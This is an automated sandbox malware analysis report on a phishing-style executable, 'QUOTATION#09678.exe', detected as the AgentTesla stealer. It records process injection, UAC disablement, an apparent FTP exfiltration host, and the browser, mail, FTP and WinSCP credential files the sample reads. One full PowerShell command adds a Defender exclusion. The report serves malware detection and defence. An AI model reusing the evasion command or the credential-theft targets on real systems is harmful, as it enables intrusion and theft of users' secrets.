                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, IUOWg.csReference to suspicious API methods: jbDd2l.OpenProcess(BxXbof.DuplicateHandle, bInheritHandle: true, (uint)ou7yaxEwwl2.ProcessID)
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A38008Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeQueries volume information: C:\Users\user\Desktop\QUOTATION#09678.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Disables UAC (registry)
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 1104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5868, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 1104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5868, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 1104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5868, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		1
                  Exfiltration Over Alternative Protocol                  		Abuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts311
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		441
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model21
                  Input Capture                  		23
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script151
                  Virtualization/Sandbox Evasion                  		LSA Secrets151
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548264 Sample: QUOTATION#09678.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 25 ip-api.com 2->25 27 ftp.ercolina-usa.com 2->27 29 2 other IPs or domains 2->29 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 10 other signatures 2->43 8 QUOTATION#09678.exe 1 4 2->8         started        signatures3 process4 signatures5 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->45 47 Writes to foreign memory regions 8->47 49 Allocates memory in foreign processes 8->49 51 3 other signatures 8->51 11 AddInProcess32.exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 2 other processes 8->19 process6 dnsIp7 31 ercolina-usa.com 192.254.225.136, 21, 31892, 32771 UNIFIEDLAYER-AS-1US United States 11->31 33 ip-api.com 208.95.112.1, 49732, 80 TUT-ASUS United States 11->33 35 api.ipify.org 172.67.74.152, 443, 49730 CLOUDFLARENETUS United States 11->35 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->55 57 Tries to steal Mail credentials (via file / registry access) 11->57 61 4 other signatures 11->61 59 Loading BitLocker PowerShell Module 15->59 21 WmiPrvSE.exe 15->21         started        23 conhost.exe 15->23         started        signatures8 process9

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  QUOTATION#09678.exe37%ReversingLabsWin64.Trojan.Jalapeno
                  QUOTATION#09678.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.ipify.org/0%URL Reputationsafe
                  https://api.ipify.org0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  https://api.ipify.org/t0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  http://ftp.ercolina-usa.com0%Avira URL Cloudsafe
                  http://ercolina-usa.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ercolina-usa.com
                  		192.254.225.136
                  		truetrue
                    		unknown
                    api.ipify.org
                    		172.67.74.152
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        ftp.ercolina-usa.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgQUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.8.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.ipify.org/tAddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ftp.ercolina-usa.comAddInProcess32.exe, 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002E3C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ercolina-usa.comAddInProcess32.exe, 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002E3C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.comAddInProcess32.exe, 00000004.00000002.4171451807.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          192.254.225.136
                          		ercolina-usa.comUnited States
                          		46606UNIFIEDLAYER-AS-1UStrue
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          172.67.74.152
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1548264
                          Start date and time:2024-11-04 09:28:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:QUOTATION#09678.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winEXE@11/10@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 90%
                          • Number of executed functions: 59
                          • Number of non-executed functions: 7
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: QUOTATION#09678.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          03:29:06API Interceptor11403726x Sleep call for process: AddInProcess32.exe modified
                          03:29:06API Interceptor16x Sleep call for process: powershell.exe modified
                          03:29:21API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          192.254.225.136PURCHASE SPCIFICIATIONS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              QUOTATION#5400.exeGet hashmaliciousAgentTeslaBrowse
                                QUOTATION#2800-QUANTUM MACTOOLS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  QUOTATION#2800-QUANTUM MACTOOLS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    2JHGWjmJ46.exeGet hashmaliciousAgentTeslaBrowse
                                      COTIZACI#U00d3N#08673.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        vD6qU34v9S.exeGet hashmaliciousAgentTeslaBrowse
                                          QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                            QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                              208.95.112.1MVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • ip-api.com/line/?fields=hosting
                                              MVPloader.exeGet hashmaliciousBlank GrabberBrowse
                                              • ip-api.com/line/?fields=hosting
                                              PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • ip-api.com/json
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • ip-api.com/json
                                              4hrQ9TIhLv.exeGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              payment.details.lnk.lnkGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
